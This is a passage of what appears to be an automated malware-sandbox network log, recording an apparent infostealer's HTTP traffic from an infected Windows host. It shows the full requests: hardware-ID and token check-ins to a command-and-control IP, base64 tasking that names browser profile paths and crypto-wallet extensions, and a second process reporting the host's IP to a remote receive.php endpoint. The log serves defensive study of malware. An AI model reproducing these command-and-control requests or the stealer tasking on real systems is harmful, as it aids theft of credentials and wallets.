                                                                                                                                                                                                                                          Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                                                                                                                                          2024-10-02 12:44:43 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                          Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          88192.168.2.65862049.12.197.9443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:44 UTC184OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:45 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          89192.168.2.65862149.12.197.9443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:44 UTC184OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:45 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          90192.168.2.65862249.12.197.9443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:45 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:45 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 30 38 43 39 33 43 36 34 34 33 33 34 33 30 33 37 33 35 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 2d 2d 0d
                                                                                                                                                                                                                                          Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="hwid"7C08C93C64433430373531-a33c7340-61ca------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------JEHDHIEGIIIDHIDHDHJJ--
                                                                                                                                                                                                                                          2024-10-02 12:44:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:46 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:46 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 37 31 30 61 61 65 39 36 37 33 32 61 38 66 30 34 32 30 30 66 39 65 31 36 63 66 33 34 64 38 65 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|5710aae96732a8f04200f9e16cf34d8e|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          91192.168.2.65862349.12.197.9443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:45 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:45 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 30 38 43 39 33 43 36 34 34 33 33 34 33 30 33 37 33 35 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d
                                                                                                                                                                                                                                          Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="hwid"7C08C93C64433430373531-a33c7340-61ca------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DHCBAEHJJJKKFIDGHJEC--
                                                                                                                                                                                                                                          2024-10-02 12:44:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:46 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:46 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 65 34 36 33 62 63 63 64 39 63 35 36 65 38 38 66 63 61 66 37 63 61 36 63 39 30 65 35 38 38 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|3e463bccd9c56e88fcaf7ca6c90e5884|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          92192.168.2.65862549.12.197.9443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:47 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJ
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 31 30 61 61 65 39 36 37 33 32 61 38 66 30 34 32 30 30 66 39 65 31 36 63 66 33 34 64 38 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="token"5710aae96732a8f04200f9e16cf34d8e------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------GCGHIIDHCGHCAAAAAFIJCont
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:47 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          93192.168.2.65862449.12.197.9443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:47 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJ
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 34 36 33 62 63 63 64 39 63 35 36 65 38 38 66 63 61 66 37 63 61 36 63 39 30 65 35 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="token"3e463bccd9c56e88fcaf7ca6c90e5884------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------GCGHIIDHCGHCAAAAAFIJCont
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:47 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          94192.168.2.658627172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:48 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FphdoCkk4Uo%2FKSDYaCMFCwU3ZmxkxtI9IvJdUS5n%2BxrjDiDddy1nqL2ktVptJce64LqLEHNAViUKbMzG2vuRtcZp36903nUxbijoWw0tLU7uy6P44ojyvPKSqxKL8BCN%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9315b684297-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          95192.168.2.65862949.12.197.9443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 34 36 33 62 63 63 64 39 63 35 36 65 38 38 66 63 61 66 37 63 61 36 63 39 30 65 35 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"3e463bccd9c56e88fcaf7ca6c90e5884------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------BGDAAKJJDAAKFHJKJKFCCont
                                                                                                                                                                                                                                          2024-10-02 12:44:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:49 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:49 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          96192.168.2.65862849.12.197.9443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 31 30 61 61 65 39 36 37 33 32 61 38 66 30 34 32 30 30 66 39 65 31 36 63 66 33 34 64 38 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"5710aae96732a8f04200f9e16cf34d8e------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------IDBKKKKKFBGDGDHIDBGHCont
                                                                                                                                                                                                                                          2024-10-02 12:44:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:49 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
